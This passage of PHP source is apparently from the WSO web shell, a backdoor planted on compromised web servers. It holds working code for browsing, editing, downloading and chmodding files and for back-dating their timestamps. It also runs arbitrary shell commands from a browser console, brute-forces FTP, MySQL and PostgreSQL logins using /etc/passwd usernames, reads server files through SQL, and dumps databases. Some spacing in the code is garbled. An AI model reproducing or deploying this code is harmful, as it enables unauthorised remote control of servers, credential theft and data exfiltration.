674 $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'].$dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'].$dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
675 if (@is_file($GLOBALS['cwd'].$dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
676 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
677 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir'));
678 }
679 $GLOBALS['sort'] = $sort;
680
681 function wsoCmp($a, $b) {
682 if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
683 else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
684 }
685 usort($files, "wsoCmp");
686 usort($dirs, "wsoCmp");
687 $files = array_merge($dirs, $files);
688 $l = 0;
689 foreach($files as $f) {
690 echo '<tr'.($l ? ' class=l1' : '').
691 '><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).
692 '" class=chkbx></td><td><a href=# onclick="'.(($f['type'] == 'file') ? 'g(\'FilesTools\',null,\''.urlencode($f['name']).
693 '\', \'view\')">'.htmlspecialchars($f['name']) : 'g(\'FilesMan\',\''.$f['path'].
694 '\');" '.(empty($f['link']) ? '' : "title='{$f['link']}'").
695 '><b>[ '.htmlspecialchars($f['name']).
696 ' ]</b>').
697 '</a></td><td>'.(($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']).
698 '</td><td>'.$f['modify'].
699 '</td><td>'.$f['owner'].
700 '/'.$f['group'].
701 '</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).
702 '\',\'chmod\')">'.$f['perms'].
703 '</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).
704 '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).
705 '\', \'touch\')">T</a>'.(($f['type'] == 'file') ? ' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).
706 '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).
707 '\', \'download\')">D</a>' : '').
708 '</td></tr>';
709 $l = $l ? 0 : 1;
710 }
711 echo "<tr><td colspan=7> < input type = hidden name = a value = 'FilesMan' >
712 < input type = hidden name = c value = '" . htmlspecialchars($GLOBALS['
713 cwd ']) . "' >
714 < input type = hidden name = charset value = '" . (isset($_POST['
715 charset ']) ? $_POST['
716 charset '] : '
717 ') . "' >
718 < select name = 'p1' > < option value = 'copy' > Copy < /option><option value='move'>Move</option > < option value = 'delete' > Delete < /option>";
719 if (class_exists('ZipArchive')) echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
720 echo "<option value='tar'>Compress (tar.gz)</option>";
721 if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>Paste / Compress</option>";
722 echo "</select> ";
723 if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='wso_".date("Ymd_His").
724 ".".($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz').
725 "'> ";
726 echo "<input type='submit' value='>>'></td></tr></form></table></div>";
727 wsoFooter();
728 }
729
730 function actionStringTools() {
731 if (!function_exists('hex2bin')) {
732 function hex2bin($p) {
733 return decbin(hexdec($p));
734 }
735 }
736 if (!function_exists('binhex')) {
737 function binhex($p) {
738 return dechex(bindec($p));
739 }
740 }
741 if (!function_exists('hex2ascii')) {
742 function hex2ascii($p) {
743 $r = '';
744 for ($i = 0; $i < strLen($p); $i += 2) {
745 $r. = chr(hexdec($p[$i].$p[$i + 1]));
746 }
747 return $r;
748 }
749 }
750 if (!function_exists('ascii2hex')) {
751 function ascii2hex($p) {
752 $r = '';
753 for ($i = 0; $i < strlen($p); ++$i) $r. = sprintf('%02X', ord($p[$i]));
754 return strtoupper($r);
755 }
756 }
757 if (!function_exists('full_urlencode')) {
758 function full_urlencode($p) {
759 $r = '';
760 for ($i = 0; $i < strlen($p); ++$i) $r. = '%'.dechex(ord($p[$i]));
761 return strtoupper($r);
762 }
763 }
764 $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', );
765 if (isset($_POST['ajax'])) {
766 WSOsetcookie(md5($_SERVER['HTTP_HOST']).
767 'ajax', true);
768 ob_start();
769 if (in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']);
770 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()), "
771
772 \
773 ' ") . "';
774 ";
775 echo strlen($temp), "
776 ", $temp;
777 exit;
778 }
779 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).
780 'ajax', 0);
781 wsoHeader();
782 echo '<h1>String conversions</h1><div class=content>';
783 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
784 foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v).
785 "'>".$k.
786 "</option>";
787 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).
788 'ajax'] ? 'checked' : '').
789 "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])).
790 "</textarea></form><pre class='ml1' style='".(empty($_POST['p1']) ? 'display:none;' : '').
791 "margin-top:5px' id='strOutput'>";
792 if (!empty($_POST['p1'])) {
793 if (in_array($_POST['p1'], $stringTools)) echo htmlspecialchars($_POST['p1']($_POST['p2']));
794 }
795 echo "</pre></div><br><h1>Search files:</h1><div class=content> < form onsubmit = \"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> < tr > < td width = '1%' > Text: < /td><td><input type='text' name='text' style='width:100%'></td > < /tr> < tr > < td > Path: < /td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td > < /tr> < tr > < td > Name: < /td><td><input type='text' name='filename' value='*' style='width:100%'></td > < /tr> < tr > < td > < /td><td><input type='submit' value='>>'></td > < /tr> < /table></form > ";
796
797 function wsoRecursiveGlob($path) {
798 if (substr($path, -1) != '/') $path. = '/';
799 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.
800 '*', GLOB_ONLYDIR)));
801 if (is_array($paths) && @count($paths)) {
802 foreach($paths as $item) {
803 if (@is_dir($item)) {
804 if ($path != $item) wsoRecursiveGlob($item);
805 } else {
806 if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item).
807 "\", \"view\",\"\")'>".htmlspecialchars($item).
808 "</a><br>";
809 }
810 }
811 }
812 }
813 if (@$_POST['p3']) wsoRecursiveGlob($_POST['c']);
814 echo "</div><br><h1>Search for hash:</h1><div class=content> < form method = 'post'
815 target = '_blank'
816 name = 'hf' >
817 < input type = 'text'
818 name = 'hash'
819 style = 'width:200px;' > < br >
820 < input type = 'hidden'
821 name = 'act'
822 value = 'find' / >
823 < input type = 'button'
824 value = 'hashcracking.ru'
825 onclick = \"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> < input type = 'button'
826 value = 'md5.rednoize.com'
827 onclick = \"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> < input type = 'button'
828 value = 'crackfor.me'
829 onclick = \"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br> < /form></div > ";
830 wsoFooter();
831 }
832
833 function actionFilesTools() {
834 if (isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']);
835 if (@$_POST['p2'] == 'download') {
836 if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
837 ob_start("ob_gzhandler", 4096);
838 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
839 if (function_exists("mime_content_type")) {
840 $type = @mime_content_type($_POST['p1']);
841 header("Content-Type: ".$type);
842 } else header("Content-Type: application/octet-stream");
843 $fp = @fopen($_POST['p1'], "r");
844 if ($fp) {
845 while (!@feof($fp)) echo @fread($fp, 1024);
846 fclose($fp);
847 }
848 }
849 exit;
850 }
851 if (@$_POST['p2'] == 'mkfile') {
852 if (!file_exists($_POST['p1'])) {
853 $fp = @fopen($_POST['p1'], 'w');
854 if ($fp) {
855 $_POST['p2'] = "edit";
856 fclose($fp);
857 }
858 }
859 }
860 wsoHeader();
861 echo '<h1>File tools</h1><div class=content>';
862 if (!file_exists(@$_POST['p1'])) {
863 echo 'File not exists';
864 wsoFooter();
865 return;
866 }
867 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
868 if (!$uid) {
869 $uid['name'] = @fileowner($_POST['p1']);
870 $gid['name'] = @filegroup($_POST['p1']);
871 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
872 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).
873 ' <span>Size:</span> '.(is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-').
874 ' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).
875 ' <span>Owner/Group:</span> '.$uid['name'].
876 '/'.$gid['name'].
877 '<br>';
878 echo '<span>Change time:</span> '.date('Y-m-d H:i:s', filectime($_POST['p1'])).
879 ' <span>Access time:</span> '.date('Y-m-d H:i:s', fileatime($_POST['p1'])).
880 ' <span>Modify time:</span> '.date('Y-m-d H:i:s', filemtime($_POST['p1'])).
881 '<br><br>';
882 if (empty($_POST['p2'])) $_POST['p2'] = 'view';
883 if (is_file($_POST['p1'])) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
884 else $m = array('Chmod', 'Rename', 'Touch');
885 foreach($m as $v) echo '<a href=# onclick="g(null,null,\''.urlencode($_POST['p1']).
886 '\',\''.strtolower($v).
887 '\')">'.((strtolower($v) == @$_POST['p2']) ? '<b>[ '.$v.
888 ' ]</b>' : $v).
889 '</a> ';
890 echo '<br><br>';
891 switch ($_POST['p2']) {
892 case 'view':
893 echo '<pre class=ml1>';
894 $fp = @fopen($_POST['p1'], 'r');
895 if ($fp) {
896 while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
897 @fclose($fp);
898 }
899 echo '</pre>';
900 break;
901 case 'highlight':
902 if (@is_readable($_POST['p1'])) {
903 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
904 $code = @highlight_file($_POST['p1'], true);
905 echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code).
906 '</div>';
907 }
908 break;
909 case 'chmod':
910 if (!empty($_POST['p3'])) {
911 $perms = 0;
912 for ($i = strlen($_POST['p3']) - 1; $i >= 0; --$i) $perms += (int) $_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1));
913 if (!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
914 }
915 clearstatcache();
916 echo '<script>p3_="";</script><form onsubmit="g(null,null,\''.urlencode($_POST['p1']).
917 '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])), -4).
918 '"><input type=submit value=">>"></form>';
919 break;
920 case 'edit':
921 if (!is_writable($_POST['p1'])) {
922 echo 'File isn\'t writeable';
923 break;
924 }
925 if (!empty($_POST['p3'])) {
926 $time = @filemtime($_POST['p1']);
927 $_POST['p3'] = substr($_POST['p3'], 1);
928 $fp = @fopen($_POST['p1'], "w");
929 if ($fp) {
930 @fwrite($fp, $_POST['p3']);
931 @fclose($fp);
932 echo 'Saved!<br><script>p3_="";</script>';
933 @touch($_POST['p1'], $time, $time);
934 }
935 }
936 echo '<form onsubmit="g(null,null,\''.urlencode($_POST['p1']).
937 '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
938 $fp = @fopen($_POST['p1'], 'r');
939 if ($fp) {
940 while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
941 @fclose($fp);
942 }
943 echo '</textarea><input type=submit value=">>"></form>';
944 break;
945 case 'hexdump':
946 $c = @file_get_contents($_POST['p1']);
947 $n = 0;
948 $h = array('00000000<br>', '', '');
949 $len = strlen($c);
950 for ($i = 0; $i < $len; ++$i) {
951 $h[1]. = sprintf('%02X', ord($c[$i])).
952 ' ';
953 switch (ord($c[$i])) {
954 case 0:
955 $h[2]. = ' ';
956 break;
957 case 9:
958 $h[2]. = ' ';
959 break;
960 case 10:
961 $h[2]. = ' ';
962 break;
963 case 13:
964 $h[2]. = ' ';
965 break;
966 default:
967 $h[2]. = $c[$i];
968 break;
969 }
970 $n++;
971 if ($n == 32) {
972 $n = 0;
973 if ($i + 1 < $len) {
974 $h[0]. = sprintf('%08X', $i + 1).
975 '<br>';
976 }
977 $h[1]. = '<br>';
978 $h[2]. = "
979 ";
980 }
981 }
982 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].
983 '</pre></span></td><td bgcolor=#282828><pre>'.$h[1].
984 '</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).
985 '</pre></td></tr></table>';
986 break;
987 case 'rename':
988 if (!empty($_POST['p3'])) {
989 if (!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>';
990 else die('<script>g(null,null,"'.urlencode($_POST['p3']).
991 '",null,"")</script>');
992 }
993 echo '<form onsubmit="g(null,null,\''.urlencode($_POST['p1']).
994 '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).
995 '"><input type=submit value=">>"></form>';
996 break;
997 case 'touch':
998 if (!empty($_POST['p3'])) {
999 $time = strtotime($_POST['p3']);
1000 if ($time) {
1001 if (!touch($_POST['p1'], $time, $time)) echo 'Fail!';
1002 else echo 'Touched!';
1003 } else echo 'Bad time format!';
1004 }
1005 clearstatcache();
1006 echo '<script>p3_="";</script><form onsubmit="g(null,null,\''.urlencode($_POST['p1']).
1007 '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).
1008 '"><input type=submit value=">>"></form>';
1009 break;
1010 }
1011 echo '</div>';
1012 wsoFooter();
1013 }
1014
1015 function actionConsole() {
1016 if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
1017 WSOsetcookie(md5($_SERVER['HTTP_HOST']).
1018 'stderr_to_out', true);
1019 $_POST['p1']. = ' 2>&1';
1020 }
1021 elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).
1022 'stderr_to_out', 0);
1023 if (isset($_POST['ajax'])) {
1024 WSOsetcookie(md5($_SERVER['HTTP_HOST']).
1025 'ajax', true);
1026 ob_start();
1027 echo "d.cf.cmd.value='';
1028 ";
1029 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
1030 $ " . $_POST['p1'] . "
1031 " . wsoEx($_POST['p1']), "
1032
1033 \
1034 ' "));
1035 if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)) {
1036 if (@chdir($match[1])) {
1037 $GLOBALS['cwd'] = @getcwd();
1038 echo "c_='".$GLOBALS['cwd'].
1039 "';";
1040 }
1041 }
1042 echo "d.cf.output.value+='".$temp.
1043 "';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "
1044 ", $temp;
1045 exit;
1046 }
1047 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).
1048 'ajax', 0); wsoHeader(); echo "<script>
1049 if (window.Event) window.captureEvents(Event.KEYDOWN);
1050 var cmds = new Array('');
1051 var cur = 0;
1052
1053 function kp(e) {
1054 var n = (window.Event) ? e.which : e.keyCode;
1055 if (n == 38) {
1056 cur--;
1057 if (cur >= 0)
1058 document.cf.cmd.value = cmds[cur];
1059 else
1060 cur++;
1061 } else if (n == 40) {
1062 cur++;
1063 if (cur < cmds.length)
1064 document.cf.cmd.value = cmds[cur];
1065 else
1066 cur--;
1067 }
1068 }
1069
1070 function add(cmd) {
1071 cmds.pop();
1072 cmds.push(cmd);
1073 cmds.push('');
1074 cur = cmds.length - 1;
1075 } < /script>";
1076 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) {
1077 if ($v == '') {
1078 echo '<optgroup label="-'.htmlspecialchars($n).
1079 '-"></optgroup>';
1080 continue;
1081 }
1082 echo '<option value="'.htmlspecialchars($v).
1083 '">'.$n.
1084 '</option>';
1085 }
1086 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).
1087 'ajax'] ? 'checked' : '').
1088 '> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']).
1089 'stderr_to_out'] ? 'checked' : '').
1090 '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
1091 if (!empty($_POST['p1'])) {
1092 echo htmlspecialchars("$ ".$_POST['p1'].
1093 "
1094 " . wsoEx($_POST['p1']));
1095 }
1096 echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
1097 echo '</form></div><script>d.cf.cmd.focus();</script>';
1098 wsoFooter();
1099 }
1100
1101 function actionLogout() {
1102 setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
1103 die('bye!');
1104 }
1105
1106 function actionSelfRemove() {
1107 if ($_POST['p1'] == 'yes')
1108 if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed');
1109 else echo 'unlink error!';
1110 if ($_POST['p1'] != 'yes') wsoHeader();
1111 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1112 wsoFooter();
1113 }
1114
1115 function actionBruteforce() {
1116 wsoHeader();
1117 if (isset($_POST['proto'])) {
1118 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).
1119 ' <span>Server:</span> '.htmlspecialchars($_POST['server']).
1120 '<br>';
1121 if ($_POST['proto'] == 'ftp') {
1122 function wsoBruteForce($ip, $port, $login, $pass) {
1123 $fp = @ftp_connect($ip, $port ? $port : 21);
1124 if (!$fp) return false;
1125 $res = @ftp_login($fp, $login, $pass);
1126 @ftp_close($fp);
1127 return $res;
1128 }
1129 }
1130 elseif($_POST['proto'] == 'mysql') {
1131 function wsoBruteForce($ip, $port, $login, $pass) {
1132 $res = @mysql_connect($ip.
1133 ':'.($port ? $port : 3306), $login, $pass);
1134 @mysql_close($res);
1135 return $res;
1136 }
1137 }
1138 elseif($_POST['proto'] == 'pgsql') {
1139 function wsoBruteForce($ip, $port, $login, $pass) {
1140 $str = "host='".$ip.
1141 "' port='".$port.
1142 "' user='".$login.
1143 "' password='".$pass.
1144 "' dbname=postgres";
1145 $res = @pg_connect($str);
1146 @pg_close($res);
1147 return $res;
1148 }
1149 }
1150 $success = 0;
1151 $attempts = 0;
1152 $server = explode(":", $_POST['server']);
1153 if ($_POST['type'] == 1) {
1154 $temp = @file('/etc/passwd');
1155 if (is_array($temp)) foreach($temp as $line) {
1156 $line = explode(":", $line);
1157 ++$attempts;
1158 if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
1159 $success++;
1160 echo '<b>'.htmlspecialchars($line[0]).
1161 '</b>:'.htmlspecialchars($line[0]).
1162 '<br>';
1163 }
1164 if (@$_POST['reverse']) {
1165 $tmp = "";
1166 for ($i = strlen($line[0]) - 1; $i >= 0; --$i) $tmp. = $line[0][$i];
1167 ++$attempts;
1168 if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
1169 $success++;
1170 echo '<b>'.htmlspecialchars($line[0]).
1171 '</b>:'.htmlspecialchars($tmp);
1172 }
1173 }
1174 }
1175 }
1176 elseif($_POST['type'] == 2) {
1177 $temp = @file($_POST['dict']);
1178 if (is_array($temp)) foreach($temp as $line) {
1179 $line = trim($line);
1180 ++$attempts;
1181 if (wsoBruteForce($server[0], @$server[1], $_POST['login'], $line)) {
1182 $success++;
1183 echo '<b>'.htmlspecialchars($_POST['login']).
1184 '</b>:'.htmlspecialchars($line).
1185 '<br>';
1186 }
1187 }
1188 }
1189 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1190 }
1191 echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'.
1192 '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'.
1193 '<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).
1194 '">'.
1195 '<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).
1196 '">'.
1197 '<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).
1198 '">'.
1199 '<span>Server:port</span></td>'.
1200 '<td><input type=text name=server value="127.0.0.1"></td></tr>'.
1201 '<tr><td><span>Brute type</span></td>'.
1202 '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'.
1203 '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'.
1204 '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'.
1205 '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'.
1206 '<td><input type=text name=login value="root"></td></tr>'.
1207 '<tr><td><span>Dictionary</span></td>'.
1208 '<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).
1209 'passwd.dic"></td></tr></table>'.
1210 '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1211 echo '</div><br>';
1212 wsoFooter();
1213 }
1214
1215 function actionSql() {
1216 class DbClass {
1217 var $type;
1218 var $link;
1219 var $res;
1220
1221 function DbClass($type) {
1222 $this - > type = $type;
1223 }
1224
1225 function connect($host, $user, $pass, $dbname) {
1226 switch ($this - > type) {
1227 case 'mysql':
1228 if ($this - > link = @mysql_connect($host, $user, $pass, true)) return true;
1229 break;
1230 case 'pgsql':
1231 $host = explode(':', $host);
1232 if (!$host[1]) $host[1] = 5432;
1233 if ($this - > link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
1234 break;
1235 }
1236 return false;
1237 }
1238
1239 function selectdb($db) {
1240 switch ($this - > type) {
1241 case 'mysql':
1242 if (@mysql_select_db($db)) return true;
1243 break;
1244 }
1245 return false;
1246 }
1247
1248 function query($str) {
1249 switch ($this - > type) {
1250 case 'mysql':
1251 return $this - > res = @mysql_query($str);
1252 break;
1253 case 'pgsql':
1254 return $this - > res = @pg_query($this - > link, $str);
1255 break;
1256 }
1257 return false;
1258 }
1259
1260 function fetch() {
1261 $res = func_num_args() ? func_get_arg(0) : $this - > res;
1262 switch ($this - > type) {
1263 case 'mysql':
1264 return @mysql_fetch_assoc($res);
1265 break;
1266 case 'pgsql':
1267 return @pg_fetch_assoc($res);
1268 break;
1269 }
1270 return false;
1271 }
1272
1273 function listDbs() {
1274 switch ($this - > type) {
1275 case 'mysql':
1276 return $this - > query("SHOW databases");
1277 break;
1278 case 'pgsql':
1279 return $this - > res = $this - > query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1280 break;
1281 }
1282 return false;
1283 }
1284
1285 function listTables() {
1286 switch ($this - > type) {
1287 case 'mysql':
1288 return $this - > res = $this - > query('SHOW TABLES');
1289 break;
1290 case 'pgsql':
1291 return $this - > res = $this - > query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1292 break;
1293 }
1294 return false;
1295 }
1296
1297 function error() {
1298 switch ($this - > type) {
1299 case 'mysql':
1300 return @mysql_error();
1301 break;
1302 case 'pgsql':
1303 return @pg_last_error();
1304 break;
1305 }
1306 return false;
1307 }
1308
1309 function setCharset($str) {
1310 switch ($this - > type) {
1311 case 'mysql':
1312 if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this - > link);
1313 else $this - > query('SET CHARSET '.$str);
1314 break;
1315 case 'pgsql':
1316 return @pg_set_client_encoding($this - > link, $str);
1317 break;
1318 }
1319 return false;
1320 }
1321
1322 function loadFile($str) {
1323 switch ($this - > type) {
1324 case 'mysql':
1325 return $this - > fetch($this - > query("SELECT LOAD_FILE('".addslashes($str).
1326 "') as file"));
1327 break;
1328 case 'pgsql':
1329 $this - > query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str).
1330 "';select file from wso2;");
1331 $r = array();
1332 while ($i = $this - > fetch()) $r[] = $i['file'];
1333 $this - > query('drop table wso2');
1334 return array('file' => implode("
1335 ", $r));
1336 break;
1337 }
1338 return false;
1339 }
1340
1341 function dump($table, $fp = false) {
1342 switch ($this - > type) {
1343 case 'mysql':
1344 $res = $this - > query('SHOW CREATE TABLE `'.$table.
1345 '`');
1346 $create = mysql_fetch_array($res);
1347 $sql = $create[1].
1348 ";
1349 ";
1350 if ($fp) fwrite($fp, $sql);
1351 else echo($sql);
1352 $this - > query('SELECT * FROM `'.$table.
1353 '`');
1354 $i = 0;
1355 $head = true;
1356 while ($item = $this - > fetch()) {
1357 $sql = '';
1358 if ($i % 1000 == 0) {
1359 $head = true;
1360 $sql = ";
1361
1362 ";
1363 }
1364 $columns = array();
1365 foreach($item as $k => $v) {
1366 if ($v === null) $item[$k] = "NULL";
1367 elseif(is_int($v)) $item[$k] = $v;
1368 else $item[$k] = "'".@mysql_real_escape_string($v).
1369 "'";
1370 $columns[] = "`".$k.
1371 "`";
1372 }
1373 if ($head) {
1374 $sql. = 'INSERT INTO `'.$table.
1375 '` ('.implode(", ", $columns).
1376 ") VALUES (" . implode(", ", $item) . ')';
1377 $head = false;
1378 } else $sql. = ", (" . implode(", ", $item) . ')';
1379 if ($fp) fwrite($fp, $sql);
1380 else echo($sql); $i++;
1381 }
1382 if (!$head)
1383 if ($fp) fwrite($fp, ";
1384
1385 ");
1386 else echo(";
1387
1388 ");
1389 break;
1390 case 'pgsql':
1391 $this - > query('SELECT * FROM '.$table);
1392 while ($item = $this - > fetch()) {
1393 $columns = array();
1394 foreach($item as $k => $v) {
1395 $item[$k] = "'".addslashes($v).
1396 "'";
1397 $columns[] = $k;
1398 }
1399 $sql = 'INSERT INTO '.$table.
1400 ' ('.implode(", ", $columns).
1401 ') VALUES ('.implode(", ", $item).
1402 ');'.
1403 "
1404 ";
1405 if ($fp) fwrite($fp, $sql);
1406 else echo($sql);
1407 }
1408 break;
1409 }
1410 return false;
1411 }
1412 };
1413 $db = new DbClass($_POST['type']);
1414 if ((@$_POST['p2'] == 'download') && (@$_POST['p1'] != 'select')) {
1415 $db - > connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1416 $db - > selectdb($_POST['sql_base']);
1417 switch ($_POST['charset']) {
1418 case "Windows-1251":
1419 $db - > setCharset('cp1251');
1420 break;
1421 case "UTF-8":
1422 $db - > setCharset('utf8');
1423 break;
1424 case "KOI8-R":
1425 $db - > setCharset('koi8r');
1426 break;
1427 case "KOI8-U":
1428 $db - > setCharset('koi8u');
1429 break;
1430 case "cp866":
1431 $db - > setCharset('cp866');
1432 break;
1433 }
1434 if (empty($_POST['file'])) {
1435 ob_start("ob_gzhandler", 4096);
